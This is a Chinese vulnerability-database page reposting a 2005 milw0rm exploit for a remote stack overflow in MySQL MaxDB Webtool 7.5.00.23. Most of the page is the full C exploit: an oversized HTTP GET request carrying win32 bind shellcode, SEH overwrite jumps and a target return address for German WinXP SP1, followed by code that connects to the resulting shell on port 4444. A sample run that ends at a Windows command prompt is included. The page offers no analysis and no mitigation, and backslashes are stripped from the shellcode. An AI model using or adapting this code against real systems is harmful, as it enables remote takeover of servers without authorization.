MySQL MaxDB Webtool 7.5.00.23 – Remote Stack Overflow
| 漏洞ID | 1055067 | 漏洞类型 | |
| 发布时间 | 2005-04-27 | 更新时间 | 2005-04-27 |
![图片[1]-MySQL MaxDB Webtool 7.5.00.23 – Remote Stack Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-MySQL MaxDB Webtool 7.5.00.23 – Remote Stack Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* MySQL MaxDB Webtool Remote Stack Overflow Exploit
*
* cybertronic[at]gmx[dot]net
*
* 04/27/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0x100163d2] esi ebp ret
* --[ 1 [0xdeadc0de] crash server
* >> 0
* --[ connecting to 192.168.2.103:9999...done!
* --[ sending packet [ 16383 bytes ]...done!
* --[ sleeping 5 seconds before connecting to 192.168.2.103:4444...
* --[ connecting to 192.168.2.103:4444...done!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:WINDOWSsystem32>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 9999
#define RED "E[31mE[1m"
#define GREEN "E[32mE[1m"
#define YELLOW "E[33mE[1m"
#define BLUE "E[34mE[1m"
#define NORMAL "E[m"
/*
*
* prototypes
*
*/
int exploit ( int s, unsigned long ret );
int isip ( char *ip );
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
/*********************
* Windows Shellcode *
*********************/
/* win32_bind */
unsigned char bindshell[] =
"x31xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x92"
"x35x88x95x83xebxfcxe2xf4x6ex5fx63xdax7axccx77x6a"
"x6dx55x03xf9xb6x11x03xd0xaexbexf4x90xeax34x67x1e"
"xddx2dx03xcaxb2x34x63x76xa2x7cx03xa1x19x34x66xa4"
"x52xacx24x11x52x41x8fx54x58x38x89x57x79xc1xb3xc1"
"xb6x1dxfdx76x19x6axacx94x79x53x03x99xd9xbexd7x89"
"x93xdex8bxb9x19xbcxe4xb1x8ex54x4bxa4x52x51x03xd5"
"xa2xbexc8x99x19x45x94x38x19x75x80xcbxfaxbbxc6x9b"
"x7ex65x77x43xa3xeexeexc6xf4x5dxbbxa7xfax42xfbxa7"
"xcdx61x77x45xfaxfex65x69xa9x65x77x43xcdxbcx6dxf3"
"x13xd8x80x97xc7x5fx8ax6ax42x5dx51x9cx67x98xdfx6a"
"x44x66xdbxc6xc1x66xcbxc6xd1x66x77x45xf4x5dx99xc9"
"xf4x66x01x74x07x5dx2cx8fxe2xf2xdfx6ax44x5fx98xc4"
"xc7xcax58xfdx36x98xa6x7cxc5xcax5exc6xc7xcax58xfd"
"x77x7cx0exdcxc5xcax5exc5xc6x61xddx6ax42xa6xe0x72"
"xebxf3xf1xc2x6dxe3xddx6ax42x53xe2xf1xf4x5dxebxf8"
"x1bxd0xe2xc5xcbx1cx44x1cx75x5fxccx1cx70x04x48x66"
"x38xcbxcaxb8x6cx77xa4x06x1fx4fxb0x3ex39x9exe0xe7"
"x6cx86x9ex6axe7x71x77x43xc9x62xdaxc4xc3x64xe2x94"
"xc3x64xddxc4x6dxe5xe0x38x4bx30x46xc6x6dxe3xe2x6a"
"x6dx02x77x45x19x62x74x16x56x51x77x43xc0xcax58xfd"
"x62xbfx8cxcaxc1xcax5ex6ax42x35x88x95";
unsigned char jmp1[] =
"xebx08";
unsigned char jmp2[] =
"xe9xe2xf7xffxff"; //jmp -2078
/*
*
* structures
*
*/
struct targets {
int num;
unsigned long ret;
char name[64];
}
target[]= {
{ 0, 0x100163d2, "WinXP Pro SP1 GER" }, //tested working on my WinXP Pro SP1 box [ pop pop ret in wapi.dll ]
{ 1, 0xdeadc0de, "crash server" },
};
/*
*
* functions
*
*/
int
exploit ( int s, unsigned long ret )
{
char buffer[16384];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x90, sizeof ( buffer ) -13 );
strncpy ( buffer, "GET /%", 6 );
memcpy ( buffer + 1600, bindshell, sizeof ( bindshell ) - 1 );
memcpy ( buffer + 3657, jmp1, sizeof ( jmp1 ) -1 );
/*
*
* SEH offset changes for different binary path
* This exploits WinXP Pro SP1 GER asuming the
* default path of C:ProgrammesdbprogramswebDocuments
* englisch version is supported by metasploit
* http://www.metasploit.com/projects/Framework/modules/exploits/maxdb_webdbm_get_overflow.pm
*
*/
strncpy ( buffer + 3661, ( unsigned char* ) &ret, 4 );
memcpy ( buffer + 3673, jmp2, sizeof ( jmp2 ) -1 );
strncat ( buffer, "HTTP/1.0rnrn", 12 );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
return ( 0 );
}
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
usleep(10);
}
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve "%s"n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ("--[ sleeping %d seconds before connecting to %s:%u...n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
shell ( s, tip, bport );
}
void
header ()
{
printf ( " __ __ _ n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ n" );
printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ n" );
printf ( "\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ n" );
printf ( " /____/ nn" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s, targ, i;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
{
printf ( "Usage: %s <ip>n", argv[0] );
exit ( 1 );
}
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
{
printf ( "Invalid Target IP!n" );
exit ( 1 );
}
printf("--[ select targetn");
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %sn", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
if ( targ != 0 )
if ( targ != 1 )
{
printf ( "--[ invalid target!n" );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve "%s"n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!n" );
exit ( 1 );
}
printf ( "done!n" );
if ( exploit ( s, target[targ].ret ) == 1 )
{
printf ( "exploitation FAILED!n" );
exit ( 1 );
}
close ( s );
connect_to_bindshell ( argv[1], 4444 );
}
// milw0rm.com [2005-04-27]相关推荐: Xoops 1.0/1.3.x – BBCode HTML Injection
Xoops 1.0/1.3.x – BBCode HTML Injection 漏洞ID 1054094 漏洞类型 发布时间 2003-08-13 更新时间 2003-08-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666